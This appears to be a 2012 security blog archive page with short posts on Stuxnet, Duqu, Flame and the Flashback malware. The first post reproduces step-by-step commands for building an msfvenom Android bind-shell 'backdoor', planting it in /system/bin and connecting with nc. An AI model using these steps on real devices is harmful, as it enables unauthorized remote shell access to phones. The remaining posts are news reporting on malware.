
Posted by on Oct 5, 2012 in Infosec, Malware | 0 comments

A simple android shell with Metasploit

_anUBiS, a respected member of the Corrupt computer security forum, has posted a method to open an Android shell with the Metasploit Framework. The steps given by him are as follows:

1) Create an ARM executable: msfvenom -p linux/armle/shell_bind_tcp -f elf LPORT=6666 > /tmp/backdoor
2) Mount your Android /system/bin dir for r/w. I used the “Root Explorer” app for this. There are other ways to do it.
3) Copy /tmp/backdoor (from Backtrack) to /system/bin/backdoor (your phone) and chmod 777.
4) Run ‘backdoor’ on your phone. (Use a terminal emulator, or find any other way.)
5) Connect to the phone: nc your.phone.ip.address 6666
6) When the connection is established, set the PATH variable: PATH=/system/bin

He further says it still needs root permission to plant this, and the shell does not listen persistently, so when we disconnect, the file must be run again on the phone. Source: ...

Posted by on Jun 9, 2012 in Infosec, Malware | 0 comments

Operation: Olympic Games, the secrets behind the world's first sophisticated cyber attack malware – Stuxnet

Iran’s president Ahmadinejad looking at the centrifuges

The world’s first sophisticated cyber attack malware, Stuxnet, was the weapon of the operation “Olympic Games”, says The New York Times in an article published earlier this week. The detailed article says a cyberwar against Iran’s nuclear enrichment program was launched during the Bush administration and was accelerated by the Obama administration. The operation was called ‘Olympic Games’. Stuxnet was the weapon of Olympic Games, jointly developed by the NSA (National Security Agency) of America and Israel’s Unit 8200 (part of Israel’s military technical intelligence unit). Israel cooperated with the United States in this operation, disabling Iran’s nuclear enrichment program by sabotaging thousands of centrifuges in the Natanz underground nuclear plant in Iran. The Stuxnet malware was intended to infect only the computers connected with the centrifuges, but it went wild due to an error in the program in one of the updates that followed the initial version. It seems the malware was initially introduced to the computers in the Natanz plant by...

Posted by on Jun 6, 2012 in Infosec, Malware | 0 comments

Techs ask for Stuxnet-Duqu-Flame code, say it is open source!!

Duqu Framework

Techs from CrySyS, an information security blog, say that the latest series of state-sponsored cyber attack malware uses open source libraries. The malware uses a number of libraries to perform the activities associated with its purpose, such as compressing files, connecting to remote servers and storing information in databases. Based on the information collected from malware like Stuxnet, Duqu and Flame, the guys at CrySyS have reported a few libraries which are supposedly used in their code:

Duqu:
- modified LZO for .zdata: LZO and the LZO algorithms and implementations are distributed under the terms of the GNU General Public License (GPL).

Flame:
- putty – MIT license
- libbz2 – BSD-style license
- zlib – very permissive license, http://www.gzip.org/zlib/zlib_license.html
- SQLite – public domain
- Lua – MIT license

On a lighter note, they say that since the malware uses open source code, they should give out the code of this malware too!! Source: ...

Posted by on May 30, 2012 in Infosec, Malware | 0 comments

Iran develops tools to defend against Flame malware

The sophistication of the Flame malware made it hard for security software to detect it.

Iran has developed tools that can help it defend against the latest malware to hit its infrastructure, known as Flame. Iran has been hit by sophisticated malware for the past few years, targeted at its nuclear infrastructure. The latest in that series of malware, after Stuxnet and Duqu, is Flame. Flame seems to infiltrate networks and steal sensitive data. Flame tried to circumvent scanning by security software by disguising itself as a genuine computer file. Flame was first discovered after the UN’s International Telecommunications Union asked security firms for help to find out what was wiping data from machines across the Middle East. Judging from the sophistication of the malware, it seems to have originated from a state-sponsored cyber attack on Iran, like before. But unlike previous attacks, the Flame malware seems to have affected only a few hundred computers. Iran’s National Computer Emergency Response Team (Maher) said in a statement that the detection and clean-up tool was finished in...

Posted by on Apr 13, 2012 in Infosec, Malware | 0 comments

Apple releases security update to fix Flashback malware

Apple has released the much needed security update to fix the Flashback malware

Apple today released the security update for Java to fix the infamous Flashback malware, which has affected over 1 million computers running OS X over the past months. This security update claims to remove known traces of the Flashback malware and to disable automatic execution of Java applets. It was through Java applets that the Flashback malware tricked users into believing they were updating the Adobe Flash Player in their...

Posted by on Mar 9, 2012 in Infosec, Malware | 0 comments

Duqu aka Stuxnet 2.0 Trojan has unknown programming language!! Kaspersky asks help of programmers

This code, which is the payload, seems to have been written in an unknown programming language

According to Kaspersky, which is analysing the Duqu malware (also known to some as Stuxnet 2.0), the payload DLL, which communicates with the Command and Control (C&C) server, seems to have been written in a coding language never seen before. Some parts of it, including those for downloading and executing additional modules, were written in standard C++, but a big chunk of it was not. This particular section contains no references to any standard or user-written C++ functions, and may have been created by a different programming team. Kaspersky says many parts of Duqu are directly borrowed from Stuxnet, but this one is new. The company has named it the Duqu Framework and has noted that it is not written in C++, Objective C, Java,...
